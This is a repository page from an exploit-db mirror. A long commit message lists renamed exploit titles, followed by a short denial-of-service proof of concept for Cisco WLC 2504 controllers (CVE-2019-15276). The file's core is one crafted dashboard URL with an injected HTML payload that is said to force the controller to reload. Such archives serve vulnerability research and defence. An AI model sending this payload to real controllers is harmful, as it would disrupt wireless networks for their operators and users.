bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/47744.txt
Offensive Security ccea007282 DB: 2020-05-01 
81 changes to exploits/shellcodes

WordPress 2.9 - Denial of Service
WordPress Core 2.9 - Denial of Service

Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)
Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) (PoC)

IBM AIX 4.3.1 - 'adb' Denial of Service

Jzip -  Buffer Overflow (PoC) (SEH Unicode)
Jzip - Buffer Overflow (PoC) (SEH Unicode)
WordPress 4.0 - Denial of Service
WordPress < 4.0.1 - Denial of Service
WordPress Core 4.0 - Denial of Service
WordPress Core < 4.0.1 - Denial of Service
Mediacoder 0.8.33 build 5680 - '.m3u'  Buffer Overflow (PoC) (SEH Overwrite)
Mediacoder 0.8.33 build 5680 - '.lst'  Buffer Overflow (PoC) (SEH Overwrite)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite)

Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service

PHPFreeChat 1.7 - Denial of Service

XenForo 2 - CSS Loader Denial of Service

MikroTik 6.41.4 - FTP daemon Denial of Service (PoC)
Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service
Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service

Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service

AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)

Wansview 1.0.2 - Denial of Service (PoC)

StyleWriter 4 1.0 - Denial of Service (PoC)

Any Sound Recorder 2.93 - Denial of Service (PoC)

Snes9K 0.0.9z - Denial of Service (PoC)

Virgin Media Hub 3.0 Router - Denial of Service (PoC)

Intelbras IWR 3000N - Denial of Service (Remote Reboot)

Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service (PoC)

Windows PowerShell - Unsanitized Filename Command Execution
Microsoft Windows PowerShell - Unsanitized Filename Command Execution

QEMU - Denial of Service

Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC)
Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter
Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File
Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File
Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File
Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File
Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File
Microsoft Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter
Microsoft Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File
Microsoft Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File
Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File
Microsoft Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File
Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File

Bematech Printer MP-4200 - Denial of Service

Cisco WLC 2504 8.9 - Denial of Service (PoC)

FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)
FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)

WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service

FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)
FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)

Tautulli 2.1.9 - Denial of Service (Metasploit)

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

TP-Link Archer C50 3 - Denial of Service (PoC)

Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)

Cisco IP Phone 11.7 - Denial of service (PoC)

PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions  Bypass
PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions Bypass

IBM AIX 4.3.1 - 'adb' Denial of Service

Systrace 1.x (Linux Kernel  x64) - Aware Local Privilege Escalation
Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation

Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation
Vm86 - Syscall Task Switch Kernel Panic Denial of Service / Privilege Escalation

Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC
Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service
Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)

AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)

Wansview 1.0.2 - Denial of Service (PoC)

StyleWriter 4 1.0 - Denial of Service (PoC)

Any Sound Recorder 2.93 - Denial of Service (PoC)

Snes9K 0.0.9z - Denial of Service (PoC)

Pronestor Health Monitoring < 8.1.11.0  - Privilege Escalation
Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation

Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)
Microsoft Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)

Linux Kernel 4.8.0-34 < 4.8.0-45  (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation
Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation

Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass
Microsoft Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass
Windows NTFS - Privileged File Access Enumeration
Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)
Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)
Microsoft Windows NTFS - Privileged File Access Enumeration
Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) (Metasploit)
Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) and Registry (Metasploit)

Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC)

_GCafé 3.0  - 'gbClienService' Unquoted Service Path
_GCafé 3.0 - 'gbClienService' Unquoted Service Path

Wondershare Application Framework Service - _WsAppService_  Unquote Service Path
Wondershare Application Framework Service - _WsAppService_ Unquote Service Path
Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)
Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)
Microsoft Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)
Microsoft Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)

Bash 5.0 Patch 11 -  SUID Priv Drop Exploit
Bash 5.0 Patch 11 - SUID Priv Drop Exploit

Windows - Shell COM Server Registrar Local Privilege Escalation
Microsoft Windows - Shell COM Server Registrar Local Privilege Escalation

Windows Kernel  - Information Disclosure
Microsoft Windows Kernel - Information Disclosure
NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path
Andrea ST Filters Service  1.0.64.7  - 'Andrea ST Filters Service ' Unquoted Service Path
NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path

Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service
Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service

Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting

WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)

WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)

Windows PowerShell ISE - Remote Code Execution
Microsoft Windows PowerShell ISE - Remote Code Execution

QEMU - Denial of Service

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

WordPress 1.2 - HTTP Splitting
WordPress Core 1.2 - HTTP Splitting

WordPress 1.5.1.1 - SQL Injection
WordPress Core 1.5.1.1 - SQL Injection

WordPress 1.5.1.1 - 'add new admin' SQL Injection
WordPress Core 1.5.1.1 - 'add new admin' SQL Injection

WordPress 1.5.1.2 - 'xmlrpc' Interface SQL Injection
WordPress Core 1.5.1.2 - 'xmlrpc' Interface SQL Injection
WordPress 1.5.1.3 - Remote Code Execution
WordPress 1.5.1.3 - Remote Code Execution (Metasploit)
WordPress Core 1.5.1.3 - Remote Code Execution
WordPress Core 1.5.1.3 - Remote Code Execution (Metasploit)

WordPress 2.0.5 - Trackback UTF-7 SQL Injection
WordPress Core 2.0.5 - Trackback UTF-7 SQL Injection

WordPress 2.0.6 - 'wp-trackback.php' SQL Injection
WordPress Core 2.0.6 - 'wp-trackback.php' SQL Injection

WordPress 2.1.2 - 'xmlrpc' SQL Injection
WordPress Core 2.1.2 - 'xmlrpc' SQL Injection

WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing

WordPress 2.2 - 'xmlrpc.php' SQL Injection
WordPress Core 2.2 - 'xmlrpc.php' SQL Injection

WordPress 2.2 - 'wp-app.php' Arbitrary File Upload
WordPress Core 2.2 - 'wp-app.php' Arbitrary File Upload

WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities
WordPress Core 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities

WordPress 2.3.1 - Charset SQL Injection
WordPress Core 2.3.1 - Charset SQL Injection

Joomla! Component iJoomla News Portal 1.0 - 'itemID' SQL Injection
Joomla! Component iJoomla! News Portal 1.0 - 'itemID' SQL Injection

WordPress 2.6.1 - SQL Column Truncation
WordPress Core 2.6.1 - SQL Column Truncation

WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)
WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation)

WordPress 2.8.1 - 'url' Cross-Site Scripting
WordPress Core 2.8.1 - 'url' Cross-Site Scripting

WordPress 2.8.3 - Remote Admin Reset Password
WordPress Core 2.8.3 - Remote Admin Reset Password
WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution
WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
WordPress Core < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution

WordPress 2.9 - Failure to Restrict URL Access
WordPress Core 2.9 - Failure to Restrict URL Access

Joomla! Component Joomla Flickr 1.0 - Local File Inclusion
Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion

Joomla! Component Wap4Joomla - 'wapmain.php' SQL Injection
Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection

Joomla! Component Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting
Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting

Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion
Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion

WordPress 3.0.1 - 'do_trackbacks()' SQL Injection
WordPress Core 3.0.1 - 'do_trackbacks()' SQL Injection

WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)
WordPress Core 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)

WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)
WordPress Core 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)

WordPress 3.1.3 - SQL Injection
WordPress Core 3.1.3 - SQL Injection

WordPress 3.3.1 - Multiple Vulnerabilities
WordPress Core 3.3.1 - Multiple Vulnerabilities

WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Core 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities

Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting

WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection
WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection
WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting
WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress 1.2 - 'categories.php?cat_ID' Cross-Site Scripting
WordPress 1.2 - 'edit.php?s' Cross-Site Scripting
WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting
WordPress Core 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 1.2 - 'categories.php?cat_ID' Cross-Site Scripting
WordPress Core 1.2 - 'edit.php?s' Cross-Site Scripting
WordPress Core 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities

WordPress 1.2 - 'wp-login.php' HTTP Response Splitting
WordPress Core 1.2 - 'wp-login.php' HTTP Response Splitting
WordPress 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting
WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting
WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting
WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting
WordPress Core 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting
WordPress Core 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting
WordPress Core 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting
WordPress Core 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting

WordPress 1.5 - 'post.php' Cross-Site Scripting
WordPress Core 1.5 - 'post.php' Cross-Site Scripting

WordPress 2.0 - Comment Post HTML Injection
WordPress Core 2.0 - Comment Post HTML Injection

WordPress 2.0.5 - 'functions.php' Remote File Inclusion
WordPress Core 2.0.5 - 'functions.php' Remote File Inclusion

WordPress 1.x/2.0.x - 'template.php' HTML Injection
WordPress Core 1.x/2.0.x - 'template.php' HTML Injection

WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure
WordPress Core 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure
WordPress 2.1.1 - 'post.php' Cross-Site Scripting
WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting
WordPress Core 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities

WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting
WordPress Core 1.x/2.0.x - 'Templates.php' Cross-Site Scripting
WordPress 2.1.1 - Arbitrary Command Execution
WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution
WordPress Core 2.1.1 - Arbitrary Command Execution
WordPress Core 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution

WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting
WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting

WordPress 2.2 - 'Request_URI' Cross-Site Scripting
WordPress Core 2.2 - 'Request_URI' Cross-Site Scripting

WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting
WordPress Core 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting

WordPress 1.0.7 - 'Pool index.php' Cross-Site Scripting
WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting

WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities

WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting
WordPress Core 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting

WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting
WordPress Core 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting

WordPress 2.3.1 - Unauthorized Post Access
WordPress Core 2.3.1 - Unauthorized Post Access

WordPress 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting
WordPress Core 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting
WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting
WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting
WordPress Core 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting
WordPress Core 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting

WordPress 2.3.3 - 'cat' Directory Traversal
WordPress Core 2.3.3 - 'cat' Directory Traversal

WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Core 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities

WordPress 4.2 - Persistent Cross-Site Scripting
WordPress Core 4.2 - Persistent Cross-Site Scripting

WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities
WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities

WordPress 3.4.2 - Cross-Site Request Forgery
WordPress Core 3.4.2 - Cross-Site Request Forgery

Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service

WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery
WordPress Core 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery

WordPress 4.5.3 - Directory Traversal / Denial of Service
WordPress Core 4.5.3 - Directory Traversal / Denial of Service

PHPFreeChat 1.7 - Denial of Service
WordPress 4.7.0/4.7.1 - Content Injection (Python)
WordPress 4.7.0/4.7.1 - Content Injection (Ruby)
WordPress Core 4.7.0/4.7.1 - Content Injection (Python)
WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby)

WordPress < 4.7.1 - Username Enumeration
WordPress Core < 4.7.1 - Username Enumeration

WordPress Multiple Plugins - Arbitrary File Upload
Multiple  WordPress Plugins - Arbitrary File Upload

Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download
WordPress Plugin Membership Simplified 1.58 - Arbitrary File Download

Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
Joomla! Component Picture Calendar for Joomla! 3.1.4 - Directory Traversal

Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection

Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
WordPress 4.6 - Remote Code Execution
WordPress < 4.7.4 - Unauthorized Password Reset
WordPress Core 4.6 - Remote Code Execution
WordPress Core < 4.7.4 - Unauthorized Password Reset

XenForo 2 - CSS Loader Denial of Service

Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion

Joomla Component Fields - SQLi Remote Code Execution (Metasploit)
Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)

Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting
WordPress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting

Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)
Joomla! Convert Forms version 2.0.3 - Formula Injection (CSV Injection)

MikroTik 6.41.4 - FTP daemon Denial of Service PoC

Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
WordPress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting

Joomla Component Ek Rishta 2.10 - SQL Injection
Joomla! Component Ek Rishta 2.10 - SQL Injection

Raisecom  XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution
Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service

Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection
WordPress Plugin Ninja Forms 3.3.13 - CSV Injection

Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection

Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection

Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection
Joomla! Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection

Virgin Media Hub 3.0 Router - Denial of Service (PoC)

Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting
WordPress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting

WordPress CherryFramework Themes 3.1.4 - Backup File Download
WordPress Theme CherryFramework 3.1.4 - Backup File Download

WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
WordPress Plugin Easy Testimonials 3.2 - Cross-Site Scripting

Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation
WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation

Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing
WordPress Plugin Wisechat 2.6.3 - Reverse Tabnabbing

Jenkins 2.150.2 -  Remote Command Execution (Metasploit)
Jenkins 2.150.2 - Remote Command Execution (Metasploit)
Simple Online Hotel Reservation System  - SQL Injection
Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Add Admin)
Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Delete Admin)
Simple Online Hotel Reservation System - SQL Injection
Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)
Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)

phpBB 3.2.3  - Remote Code Execution
phpBB 3.2.3 - Remote Code Execution

60CycleCMS  - 'news.php' SQL Injection
60CycleCMS - 'news.php' SQL Injection

Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion
Joomla! Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion

Intelbras IWR 3000N - Denial of Service (Remote Reboot)

Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution

Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC

WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting

Centreon 19.04  - Remote Code Execution
Centreon 19.04 - Remote Code Execution

WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery
WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery

Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection
WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection

WordPress 5.2.3 - Cross-Site Host Modification
WordPress Core 5.2.3 - Cross-Site Host Modification

Joomla 3.4.6 - 'configuration.php' Remote Code Execution
Joomla! 3.4.6 - 'configuration.php' Remote Code Execution

WordPress Arforms 3.7.1 - Directory Traversal
WordPress Plugin Arforms 3.7.1 - Directory Traversal
WordPress Plugin  FooGallery 1.8.12 - Persistent Cross-Site Scripting
WordPress Plugin  Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
WordPress Plugin  Popup Builder 3.49 - Persistent Cross-Site Scripting
Restaurant Management System 1.0  - Remote Code Execution
WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting
WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting
Restaurant Management System 1.0 - Remote Code Execution

Joomla 3.9.13 - 'Host' Header Injection
Joomla! 3.9.13 - 'Host' Header Injection

Bematech Printer MP-4200 - Denial of Service

Cisco WLC 2504 8.9 - Denial of Service (PoC)

NopCommerce 4.2.0 -  Privilege Escalation
NopCommerce 4.2.0 - Privilege Escalation

WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service

Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
WordPress Plugin Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
Online Book Store 1.0 -  'bookisbn' SQL Injection
Huawei HG255 - Directory Traversal ( Metasploit )
Online Book Store 1.0 - 'bookisbn' SQL Injection
Huawei HG255 - Directory Traversal (Metasploit)

Tautulli 2.1.9 - Denial of Service ( Metasploit )
Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
WordPress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
WordPress Plugin Time Capsule 1.21.16 - Authentication Bypass

LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
WordPress Plugin LearnDash  LMS 3.1.2 - Reflective Cross-Site Scripting

WordPress InfiniteWP - Client Authentication Bypass (Metasploit)
WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)

Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting

Cacti 1.2.8 - Authenticated  Remote Code Execution
Cacti 1.2.8 - Authenticated Remote Code Execution

Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
WordPress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)

Wordpress Plugin Search Meter 2.13.2 - CSV injection
WordPress Plugin Search Meter 2.13.2 - CSV injection

Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection

Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
WordPress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting

TP-Link Archer C50 3 - Denial of Service (PoC)

Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)

Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion

Oracle WebLogic Server 12.2.1.4.0  -  Remote Code Execution
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution

Cisco IP Phone 11.7 - Denial of service (PoC)

Linux/ARM -  Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)
Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)

Linux/x86 - Rabbit Encoder Shellcode  (200 bytes)
Linux/x86 - Rabbit Encoder Shellcode (200 bytes)
2020-05-01 05:02:03 +00:00

15 lines
No EOL
587 B
Text
Raw Blame History

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276
# Exploit PoC:
https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
# Firing this code will cause the system to reload which results in a DoS condition.
Reference in a new issue View git blame Copy permalink